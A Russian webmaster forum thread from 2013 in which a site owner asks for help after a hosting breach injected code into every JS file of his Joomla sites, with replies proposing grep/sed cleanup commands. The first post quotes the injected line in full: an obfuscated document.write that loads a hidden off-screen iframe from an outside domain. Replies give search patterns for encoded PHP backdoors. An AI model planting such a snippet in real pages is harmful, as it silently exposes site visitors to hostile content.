X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Взломали хостинг, пострадали сайты, Joomla, Что делать, как решать?
topsmiling
topsmiling
Topic Starter сообщение 13.8.2013, 22:45; Ответить: topsmiling
Сообщение #1


ёёёёёёёёё ӭ
******

Группа: Active User
Сообщений: 1298
Регистрация: 6.3.2011
Из: ★звёзд★
Поблагодарили: 359 раз
Репутация:   97  


Взломали хостинг. Все сайты на хостинге пострадали.
Все JS файлы изменены и в них добавлена строка следующего содержания:
Развернуть/Свернуть

;document.write(unescape('<script%3E%0A%76%61%72%20%5F%30%78%31%33%65%61%3D%5B%22%5C%78%33%43%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%32%30%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%33%44%5C%78%32%32%5C%78%37%30%5C%78%36%46%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%33%41%5C%78%36%31%5C%78%36%32%5C%78%37%33%5C%78%36%46%5C%78%36%43%5C%78%37%35%5C%78%37%34%5C%78%36%35%5C%78%33%42%5C%78%32%30%5C%78%37%34%5C%78%36%46%5C%78%37%30%5C%78%33%41%5C%78%32%44%5C%78%33%35%5C%78%33%30%5C%78%33%38%5C%78%37%30%5C%78%37%38%5C%78%33%42%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%32%30%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%33%44%5C%78%32%32%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%41%5C%78%36%46%5C%78%36%44%5C%78%36%43%5C%78%36%31%5C%78%36%41%5C%78%36%31%5C%78%37%36%5C%78%36%31%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%31%33%65%61%5B%31%5D%5D%28%5F%30%78%31%33%65%61%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));


1 сайт = 522 js файла. На большую часть сайтов мне плевать, но 3 из них мне нужны. Итого 1500 js файлов.

Во всех папках добавлен файл. Простой HTML файл с содержанием "Hacked By WildClique , Albanian Hackers".

У меня был бэкап, я дебил его удалил час назад sad.gif

Сайты сами по себе странно обновляются. Идет редирект на какой то сайт бессмысленный, но на сам сайт не переходит.

Редактор в Joomla перестал работать нормально.

Что мне делать? Кто поможет?


--------------------
.
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 22:53; Ответить: Vangan
Сообщение #2


Бывалый
****

Группа: User
Сообщений: 484
Регистрация: 17.12.2010
Из: города где создают одни ГС
Поблагодарили: 245 раз
Репутация:   51  


может скачать все js файлы и сделать замену вредоносного кода везде, поможет это сделать программа типо Useful File Utilities или аналогичная.

Сообщение отредактировал Vangan - 13.8.2013, 22:54


--------------------
Vangan Media: создание сайтов на dle любая тематика: 500 рублей. vangan-king@ya.ru
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
topsmiling
topsmiling
Topic Starter сообщение 13.8.2013, 22:56; Ответить: topsmiling
Сообщение #3


ёёёёёёёёё ӭ
******

Группа: Active User
Сообщений: 1298
Регистрация: 6.3.2011
Из: ★звёзд★
Поблагодарили: 359 раз
Репутация:   97  


Только что обнаружил что перенаправляет на сайт http://jomlajavascript.ru/ . Вот смотрите как он обновляется странно после того как полностью загрузилась страничка.

Vangan, я сделал на одном из сайтов. Не помогло. Сайт все равно обновляется.


--------------------
.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 23:00; Ответить: Vangan
Сообщение #4


Бывалый
****

Группа: User
Сообщений: 484
Регистрация: 17.12.2010
Из: города где создают одни ГС
Поблагодарили: 245 раз
Репутация:   51  


А есть доступ к сайту по SSH?

Может сделать команду

#grep -lr --include=*.php "eval(base64_decode" /pathWebroot | xargs sed -i.bak 's/eval(base64_decode[^;]*;//'
#grep -lr --include=*.php "strrev(" /pathWebroot | xargs sed -i._bak 's/$_ = strrev([^;]*; @$_([^;]*;//'

Правда изменить их под свой вредоносный код, одна команда удалит вхождения, вторая на всякий пожарный сделает "бакуп"

Сообщение отредактировал Vangan - 13.8.2013, 23:03


--------------------
Vangan Media: создание сайтов на dle любая тематика: 500 рублей. vangan-king@ya.ru
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
LoraDi
LoraDi
сообщение 13.8.2013, 23:05; Ответить: LoraDi
Сообщение #5


С Joomla на ты...
*****

Группа: Active User
Сообщений: 836
Регистрация: 11.12.2010
Из: Молдовы
Поблагодарили: 295 раз
Репутация:   73  


Версия движков? (icq в профиле...)

Vangan, смысл… сайты взломаны… со временем эта кака появится ещё раз…

Сообщение отредактировал LoraDi - 13.8.2013, 23:06


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Vangan
Vangan
сообщение 13.8.2013, 23:18; Ответить: Vangan
Сообщение #6


Бывалый
****

Группа: User
Сообщений: 484
Регистрация: 17.12.2010
Из: города где создают одни ГС
Поблагодарили: 245 раз
Репутация:   51  


LoraDi, я подумал, что ТС требуется хотя бы востановить работоспособность сайтов, а дальше уже производить меры


--------------------
Vangan Media: создание сайтов на dle любая тематика: 500 рублей. vangan-king@ya.ru
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Регистрация Вашего сайта (профиля,DLE сайты,подписи на форумах,постинг Тиц 10> , ПР 1>)
311 kaartes 112561 17.5.2018, 19:07
автор: kaartes
Открытая тема (нет новых ответов) Покупаю муз сайты
не дорого/под развитие
4 seostock 1382 16.5.2018, 21:44
автор: seostock
Открытая тема (нет новых ответов) Куплю сайты принятые в РСЯ
Можно без дохода
0 Ksardas777 329 16.5.2018, 18:10
автор: Ksardas777
Открытая тема (нет новых ответов) Дизайн + верстка от 115$ | Сайты и лендинги | Редизайн
0 Flegs 266 16.5.2018, 13:27
автор: Flegs
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыHyperHost.ua - надежный SSD хостинг от профессионалов!
78 AllaHost 35179 15.5.2018, 16:08
автор: AllaHost


 



RSS Текстовая версия Сейчас: 21.5.2018, 2:20
Дизайн